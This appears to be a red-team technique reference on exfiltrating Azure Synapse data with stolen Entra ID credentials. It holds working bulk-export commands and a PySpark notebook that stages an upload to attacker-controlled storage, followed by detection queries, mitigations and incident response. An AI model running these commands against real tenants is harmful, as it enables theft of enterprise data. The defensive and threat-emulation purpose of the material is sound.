| Attribute | Details |
|---|---|
| Technique ID | COLLECT-DATA-004 |
| MITRE ATT&CK v18.1 | Transfer Data to Cloud Account (T1537) |
| Tactic | Collection, Exfiltration |
| Platforms | Entra ID (Azure) |
| Severity | Critical |
| CVE | N/A |
| Technique Status | ACTIVE |
| Last Verified | 2026-01-10 |
| Affected Versions | Azure Synapse Analytics all pool types (Serverless, Dedicated SQL, Spark), Synapse Studio 2.0+, Synapse CLI 1.0+ |
| Patched In | N/A - No patch available; depends on RBAC and network controls |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Azure Synapse Analytics data exfiltration involves unauthorized access to data warehousing and big data analytics services via compromised Entra ID credentials with Synapse workspace roles (Synapse SQL Administrator, Apache Spark Administrator). An attacker can execute queries against Dedicated SQL Pools or Serverless SQL endpoints to bulk-read terabytes of data, leverage Spark notebooks to process and extract datasets, or exploit linked services containing credentials to downstream systems (Data Lake Gen2, Cosmos DB). Synapse aggregates data from multiple sources (ADLS Gen2, SQL, Cosmos DB), making it a high-value exfiltration target.
Attack Surface: Entra ID accounts with Synapse workspace roles (Synapse SQL Administrator, Synapse Contributor), Azure storage credentials in linked services, Synapse workspace connection strings, workspace authentication tokens, notebook execution credentials.
Business Impact: Bulk data warehouse compromise. Attackers access consolidated datasets including operational analytics, customer insights, financial reporting data, and historical archives. Synapse often contains aggregated views of enterprise-wide data, multiplying the impact of compromise.
Technical Context: Synapse Serverless SQL queries cost roughly $5-7 per TB scanned, so large extractions (1+ TB) may trigger cost-anomaly alerts but remain difficult to attribute without detailed query monitoring. Synapse Dedicated SQL Pools provide sustained throughput for bulk operations without per-query costs, enabling stealthier exfiltration.
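The scan-cost math above is simple to sketch; a minimal estimator using the ~$5-7 per TB figure quoted above (figures illustrative, not authoritative pricing):

```python
# Rough cost estimate for a Serverless SQL extraction, using the
# ~$5-7 per TB scanned figure cited above (illustrative only).
def serverless_scan_cost(tb_scanned: float, price_per_tb: float = 5.0) -> float:
    """Return the approximate query cost in USD for a given scan volume."""
    return tb_scanned * price_per_tb

# A 3 TB bulk read at the low end of the quoted range:
print(f"${serverless_scan_cost(3):.2f}")  # → $15.00
```

At these levels a multi-terabyte read may register only as a modest cost blip, which is why the query-volume detections later in this document matter more than billing alerts.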
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.1.1, 5.1.2 | Database encryption, access control |
| DISA STIG | SV-256512 | Ensure analytics platform encryption at rest |
| NIST 800-53 | SC-13, AC-3 | Cryptographic Protection, Access Control |
| GDPR | Art. 32 | Security of Processing – Encryption, audit logs |
| DORA | Art. 9 | Protection and Prevention |
| NIS2 | Art. 21 | Cyber Risk Management Measures |
| ISO 27001 | A.10.1.3 | Segregation of duties for analytics administrators |
| ISO 27005 | Scenario: “Data warehouse breach via compromised BI credentials” | Risk of aggregate data exposure |
Supported Versions:
Tools:
# List all Synapse workspaces in subscription
az synapse workspace list --output table
# Get Synapse workspace properties
az synapse workspace show --name <workspace-name> --resource-group <rg> --query "{Location:location, DefaultDataLakeStorage:defaultDataLakeStorage.accountUrl}"
# List SQL pools (Dedicated)
az synapse sql pool list --workspace-name <workspace-name> --resource-group <rg> --output table
# List Spark pools
az synapse spark pool list --workspace-name <workspace-name> --resource-group <rg> --output table
# Get linked services (may contain credentials for downstream systems)
az synapse linked-service list --workspace-name <workspace-name> --output table
What to Look For:
# Connect to Azure
Connect-AzAccount
# List Synapse workspaces
Get-AzSynapseWorkspace -ResourceGroupName "<rg>"
# Get workspace SQL endpoint
$workspace = Get-AzSynapseWorkspace -ResourceGroupName "<rg>" -Name "<workspace>"
$workspace.ConnectivityEndpoints.SqlOnDemand
# List database users in SQL pool
# [Requires SQL connection to pool; see Execution Methods]
Supported Versions: Dedicated SQL Pools
Objective: Establish authenticated connection to Dedicated SQL Pool
Manual Steps:
1. Open SQL Server Management Studio (SSMS).
2. Server name: <workspace>.sql.azuresynapse.net
3. Authentication: Azure Active Directory - Password or Azure Active Directory - Integrated

Command (SSMS Query Window):
-- Verify connection and list databases
SELECT name FROM sys.databases;
-- Select target database
USE [database_name];
-- Query table to understand schema
SELECT TOP 100 * FROM [schema].[table_name];
-- Export all data (BCP, COPY, or CETAS)
-- Option 1: T-SQL COPY statement (Synapse native; note COPY INTO loads
-- FROM storage INTO a table - a staging/ingest step, not a direct export)
COPY INTO [staging_table]
FROM 'https://<storage-account>.blob.core.windows.net/<container>/<file-path>'
WITH (
FILE_TYPE = 'PARQUET',
CREDENTIAL = (IDENTITY = 'Shared Access Signature', SECRET = '<SAS>')
)
-- Option 2: Export to ADLS Gen2 via CREATE EXTERNAL TABLE AS SELECT (CETAS)
-- (requires an existing EXTERNAL DATA SOURCE and EXTERNAL FILE FORMAT)
CREATE EXTERNAL TABLE [export_table] WITH (
LOCATION = 'abfss://<container>@<storage>.dfs.core.windows.net/export/',
DATA_SOURCE = [DataLakeStorage],
FILE_FORMAT = [SynapseParquet]
)
AS SELECT * FROM [source_table];
Expected Output:
Query executed successfully. (7,234,567 rows affected)
External table 'export_table' created successfully.
Data written to: abfss://exports@data.dfs.core.windows.net/export/
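The CETAS export above is straightforward to template across many tables; a minimal sketch that renders one statement per table (the data source, file format, container, and table names are hypothetical placeholders, matching the example above):

```python
# Render a CETAS export statement per table (names are placeholders;
# assumes the EXTERNAL DATA SOURCE and FILE FORMAT objects already exist).
CETAS_TEMPLATE = (
    "CREATE EXTERNAL TABLE [export_{name}] WITH (\n"
    "    LOCATION = 'abfss://<container>@<storage>.dfs.core.windows.net/export/{name}/',\n"
    "    DATA_SOURCE = [DataLakeStorage],\n"
    "    FILE_FORMAT = [SynapseParquet]\n"
    ")\nAS SELECT * FROM [{schema}].[{name}];"
)

def render_cetas(schema: str, tables: list[str]) -> list[str]:
    """Build one CETAS statement for each table in the list."""
    return [CETAS_TEMPLATE.format(schema=schema, name=t) for t in tables]

for stmt in render_cetas("dbo", ["SalesData", "Customers"]):
    print(stmt, end="\n\n")
```

An attacker enumerating `sys.tables` could feed the full table list through such a template, which is why the row-count detections below aggregate across queries rather than inspecting single statements.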
Command (PowerShell):
# Connect to Data Lake storage
$storageContext = New-AzStorageContext -StorageAccountName "<storage-account>" -StorageAccountKey "<key>"
# Download exported Parquet files
Get-AzStorageBlob -Container "<container>" -Context $storageContext -Prefix "export/" |
ForEach-Object {
Get-AzStorageBlobContent -Blob $_.Name -Container "<container>" -Context $storageContext -Destination "C:\Exports\"
}
# Convert Parquet to CSV (if needed)
# [Use PySpark or pandas library]
OpSec & Evasion:
Supported Versions: All Synapse workspace versions
Objective: Navigate to notebook editor and execute extraction code
Manual Steps:
Notebook Code (PySpark):
# Import libraries
from pyspark.sql import SparkSession
from azure.storage.blob import BlobServiceClient
import json
# Initialize Spark session
spark = SparkSession.builder.appName("DataExtraction").getOrCreate()
# Connect to Synapse SQL pool
jdbc_url = "jdbc:sqlserver://<workspace>.sql.azuresynapse.net:1433;database=<db>;encrypt=true;trustServerCertificate=false;hostNameInCertificate=*.sql.azuresynapse.net;loginTimeout=30"
connection_properties = {
    "user": "<entra-id-user>@<tenant>.onmicrosoft.com",
    "password": "<password>",
    "authentication": "ActiveDirectoryPassword",  # required for Entra ID user/password sign-in
    "driver": "com.microsoft.sqlserver.jdbc.SQLServerDriver"
}
# Read entire table into DataFrame
df = spark.read.jdbc(url=jdbc_url, table="[schema].[table_name]", properties=connection_properties)
print(f"[*] Loaded {df.count()} rows from table")
# Save to Data Lake (Parquet format)
df.write.mode("overwrite").parquet("abfss://<container>@<storage>.dfs.core.windows.net/export/table_export/")
print("[+] Data exported to Data Lake")
# Export to CSV (if needed)
df.coalesce(1).write.mode("overwrite").option("header", "true").csv("abfss://<container>@<storage>.dfs.core.windows.net/export/table_export_csv/")
print("[+] CSV export complete")
# Upload to attacker storage (using blob SDK)
connection_string = "DefaultEndpointsProtocol=https;AccountName=<attacker-storage>;AccountKey=<key>;EndpointSuffix=core.windows.net"
blob_client = BlobServiceClient.from_connection_string(connection_string)
# [Code to transfer files to attacker account]
Expected Output:
[*] Loaded 12,450,000 rows from table
[+] Data exported to Data Lake
[+] CSV export complete
Supported Versions: Azure CLI 2.50+
Command:
# Execute query on Serverless SQL pool
az synapse sql query --workspace-name <workspace> \
--sql-pool-name "Built-in" \
--sql-script "SELECT * FROM [database].[schema].[table]" \
--output json > /tmp/synapse_export.json
# Alternative: Use sqlcmd to connect (-G authenticates via Azure AD)
sqlcmd -S "<workspace>-ondemand.sql.azuresynapse.net" \
-U "<user>@<tenant>.onmicrosoft.com" \
-P "<password>" \
-G \
-d "<database>" \
-Q "SELECT * FROM [schema].[table]" \
-o /tmp/export.csv
Version: 19.2 (Current) Minimum Version: 18.0 Supported Platforms: Windows
Installation:
# Download from Microsoft
# https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms
# Alternatively, install via Chocolatey
choco install sql-server-management-studio
Version: Included in Synapse runtime Supported Platforms: Spark notebooks in Synapse workspace
One-Liner (Full Extraction):
spark.read.jdbc("jdbc:sqlserver://<workspace>.sql.azuresynapse.net:1433;database=<db>", "[schema].[table]", properties={"user": "<user>", "password": "<pwd>", "authentication": "ActiveDirectoryPassword", "driver": "com.microsoft.sqlserver.jdbc.SQLServerDriver"}).write.parquet("abfss://<container>@<storage>.dfs.core.windows.net/export/")
SPL Query:
sourcetype="azure:synapse:sql" (OperationName="SELECT" OR OperationName="CETAS")
| bin _time span=10m
| stats count as QueryCount, sum(RowsAffected) as TotalRows, sum(DurationMs) as TotalDurationMs by RequesterObjectId, DatabaseName, _time
| where TotalRows > 1000000
| eval DurationMin = round(TotalDurationMs / 60000, 2)
KQL Query:
AzureDiagnostics
| where Category == "SynapseSQL"
| where OperationName in ("SELECT", "CETAS", "COPY")
| summarize TotalRowsAffected = sum(RowsAffected), QueryCount = count(), TotalDurationMs = sum(DurationMs) by PrincipalObjectId, DatabaseName, bin(TimeGenerated, 10m)
| where TotalRowsAffected > 5000000 // > 5M rows in 10 minutes
| join kind=inner (
AuditLogs
| where OperationName == "Add role member to scope"
| where TargetResources[0].displayName contains "Synapse"
| project PrincipalObjectId = tostring(InitiatedBy.user.id), RoleAssignmentTime = TimeGenerated
) on PrincipalObjectId
| where TimeGenerated - RoleAssignmentTime between (0min .. 60min)
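The volume threshold in the KQL above is easy to prototype offline; a pure-Python sketch of the same 10-minute windowed row-count aggregation over synthetic audit records (field names mirror the query; the threshold is the same illustrative 5M-row value):

```python
from collections import defaultdict
from datetime import datetime, timezone

WINDOW_SECONDS = 600        # 10-minute bins, as in the KQL summarize
ROW_THRESHOLD = 5_000_000   # > 5M rows per bin triggers, as in the KQL where clause

def flag_bulk_reads(events):
    """events: dicts with PrincipalObjectId, TimeGenerated (aware datetime), RowsAffected.
    Returns {(principal, window_start_epoch): total_rows} for windows over the threshold."""
    totals = defaultdict(int)
    for e in events:
        bucket = int(e["TimeGenerated"].timestamp()) // WINDOW_SECONDS * WINDOW_SECONDS
        totals[(e["PrincipalObjectId"], bucket)] += e["RowsAffected"]
    return {k: v for k, v in totals.items() if v > ROW_THRESHOLD}

events = [
    {"PrincipalObjectId": "u1", "TimeGenerated": datetime(2026, 1, 10, 9, 1, tzinfo=timezone.utc), "RowsAffected": 4_000_000},
    {"PrincipalObjectId": "u1", "TimeGenerated": datetime(2026, 1, 10, 9, 5, tzinfo=timezone.utc), "RowsAffected": 2_000_000},
    {"PrincipalObjectId": "u2", "TimeGenerated": datetime(2026, 1, 10, 9, 2, tzinfo=timezone.utc), "RowsAffected": 10_000},
]
print(flag_bulk_reads(events))  # only u1's 6M-row window is flagged
```

Fixed tumbling windows like this can miss bursts that straddle a bin boundary; the KQL join against recent role assignments narrows the same signal to newly privileged principals.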
Minimum Sysmon Version: 13.0+
<Sysmon schemaversion="4.81">
<!-- Detect SSMS execution and connections to Synapse -->
<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<Rule groupRelation="and">
<Image condition="contains">ssms.exe</Image>
<CommandLine condition="contains">.sql.azuresynapse.net</CommandLine>
</Rule>
</ProcessCreate>
</RuleGroup>
<!-- Detect sqlcmd usage with Synapse endpoints -->
<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<Rule groupRelation="and">
<Image condition="contains">sqlcmd.exe</Image>
<CommandLine condition="contains">.sql.azuresynapse.net</CommandLine>
</Rule>
</ProcessCreate>
</RuleGroup>
<!-- Monitor network connections to Synapse SQL endpoints -->
<RuleGroup name="" groupRelation="or">
<NetworkConnect onmatch="include">
<Rule groupRelation="and">
<DestinationHostname condition="contains">.sql.azuresynapse.net</DestinationHostname>
<DestinationPort condition="is">1433</DestinationPort>
</Rule>
</NetworkConnect>
</RuleGroup>
</Sysmon>
Alert Name: “Unusual Synapse data extraction detected”
# Find recent Synapse role assignments
$assignments = Search-UnifiedAuditLog -Operations "Add role member to scope" -StartDate (Get-Date).AddDays(-7) -FreeText "Synapse"
# Export suspicious assignments
$assignments | Where-Object { $_.AuditData -match "Synapse SQL Administrator" } | Export-Csv -Path "C:\Logs\synapse_assignments.csv"
Enforce Azure AD-Only Authentication
Objective: Disable local SQL authentication so only Entra ID identities (users, service principals, managed identities) can connect
Manual Steps (PowerShell):
# Require Azure AD-only authentication on the workspace
Enable-AzSynapseActiveDirectoryOnlyAuthentication -ResourceGroupName "rg-name" -WorkspaceName "workspace-name"
Implement Workspace Firewall Rules
Objective: Restrict Synapse access to corporate IP ranges
Manual Steps:
Enable Column-Level Security & Row-Level Security (RLS)
Objective: Prevent bulk data extraction even if credentials compromised
T-SQL Command:
-- Enable Row-Level Security on sensitive table
CREATE SCHEMA Security;
GO
CREATE FUNCTION Security.fn_securitypredicate(@UserId SYSNAME)
RETURNS TABLE
WITH SCHEMABINDING
AS
RETURN SELECT 1 as fn_securitypredicate_result
WHERE DATABASE_PRINCIPAL_ID() = DATABASE_PRINCIPAL_ID(@UserId);
GO
CREATE SECURITY POLICY SalesFilter
ADD FILTER PREDICATE Security.fn_securitypredicate(UserId)
ON dbo.[SalesData]
WITH (STATE = ON);
Implement Transparent Data Encryption (TDE)
Objective: Ensure exported data is encrypted at rest
Manual Steps:
Validation Command (Verify Fix):
# Verify Azure AD-only authentication is enforced
Get-AzSynapseWorkspace -ResourceGroupName "rg-name" -Name "workspace" | Select-Object AllowAADOnlyAuthentication
# Verify TDE is enabled
Get-AzSynapseSqlPool -ResourceGroupName "rg-name" -WorkspaceName "workspace" -Name "pool" | Select-Object TransparentDataEncryption
Process Names:
- ssms.exe
- sqlcmd.exe
- Processes with .sql.azuresynapse.net connection strings

Cloud Audit Operations:
- OperationName: "SELECT" with abnormal row counts
- OperationName: "CETAS" (Create External Table As Select)
- OperationName: "Add role member to scope" with Synapse SQL Administrator role

Network:
- Connections to *.sql.azuresynapse.net on port 1433 from non-standard IPs
- Outbound transfers to Data Lake endpoints (.dfs.core.windows.net)

Cloud Logs:
- AzureDiagnostics with Category == "SynapseSQL"
- AuditLogs with OperationName containing Synapse operations

Disk (if local extraction):
- HKEY_CURRENT_USER\Software\Microsoft\SQL Server Management Studio
- .sql files in user temp directories

1. Containment (0-5 minutes):
# Revoke Synapse roles from compromised user
Remove-AzRoleAssignment -ObjectId "<compromised-user-id>" `
-RoleDefinitionName "Synapse SQL Administrator" `
-Scope "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.Synapse/workspaces/<workspace>"
2. Investigation (5-30 minutes):
# Query Synapse audit logs for suspicious activities
$logs = Search-UnifiedAuditLog -Operations "Execute SQL" -StartDate (Get-Date).AddHours(-24)
$logs | Where-Object { $_.AuditData -match "SELECT \*" } | Export-Csv "synapse_queries.csv"
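The `SELECT *` triage above can be made less brittle than a literal string match; a minimal sketch that scans exported audit JSON for broad reads (the record shape with a `Statement` field is hypothetical, mirroring the AuditData filter in the PowerShell above):

```python
import json
import re

# Flag statements that read all columns: SELECT * or SELECT TOP n *.
# Hypothetical record shape: each record's AuditData JSON carries a "Statement" field.
BROAD_READ = re.compile(r"\bSELECT\s+(TOP\s+\d+\s+)?\*", re.IGNORECASE)

def broad_reads(audit_records):
    """Return parsed records whose SQL statement selects all columns."""
    hits = []
    for raw in audit_records:
        data = json.loads(raw)
        if BROAD_READ.search(data.get("Statement", "")):
            hits.append(data)
    return hits

records = [
    json.dumps({"User": "u1", "Statement": "SELECT * FROM dbo.SalesData"}),
    json.dumps({"User": "u2", "Statement": "SELECT name FROM sys.databases"}),
]
print(len(broad_reads(records)))  # → 1
```

The regex also catches `SELECT TOP 100 *` reconnaissance queries like the one shown in the SSMS execution method, which a plain `SELECT \*` match would still find but a stricter `SELECT \* FROM` match would not.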
3. Remediation (30-60 minutes):
# Reset Entra ID password for compromised user
Update-AzADUser -ObjectId "<user-id>" -Password (ConvertTo-SecureString "<new-strong-password>" -AsPlainText -Force)
# Reset Synapse workspace master key (if data confidentiality breached)
# [Contact Microsoft Support for workspace restoration]
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-PHISH-001] Device Code Phishing | Attacker phishes Entra ID user credentials |
| 2 | Privilege Escalation | [PE-ACCTMGMT-011] PIM Abuse | Attacker escalates to Synapse SQL Administrator |
| 3 | Collection | [COLLECT-DATA-004] Synapse Data Access | Attacker executes SELECT queries to extract data |
| 4 | Exfiltration | [COLLECT-DATA-001] Blob Storage Exfiltration | Data transferred to attacker’s Azure storage |
| 5 | Impact | [IMPACT-001] Data Destruction | Attacker deletes Synapse tables and audit logs |